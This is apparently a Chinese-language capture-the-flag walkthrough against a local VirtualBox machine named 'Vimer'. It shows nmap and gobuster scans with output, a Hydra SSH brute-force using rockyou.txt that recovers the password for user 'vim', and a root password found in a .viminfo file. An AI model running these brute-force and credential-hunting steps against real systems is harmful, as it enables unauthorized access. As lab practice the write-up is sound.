1.信息收集
1.1扫描端口
┌──(kali㉿kali)-[~]
└─$ nmap -p- -A 192.168.1.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:43 EST
Nmap scan report for bogon (192.168.1.11)
Host is up (0.0019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
|_auth-owners: vim
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Vimer
113/tcp open ident?
|_auth-owners: vim
MAC Address: 08:00:27:80:19:6C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
查看80端口
1.2目录扫描
gobuster dir -u http://192.168.1.11 -w directory-list-2.3-small.txt
Starting gobuster in directory enumeration mode
===============================================================
/vim (Status: 301) [Size: 310] [--> http://192.168.1.11/vim/\]
Progress: 87662 / 87662 (100.00%)
===============================================================
Finished
Hydra 工具对 SSH 服务进行暴力破解
rockyou.txt是一个著名的密码字典文件
hydra -l vim -P /usr/share/wordlists/rockyou.txt 192.168.1.11 ssh
vim:000001
ssh vim@192.168.1.11
000001
进入vim视图
查看.viminfo
:e ./.viminfo
发现root密码
root:xxxxoooo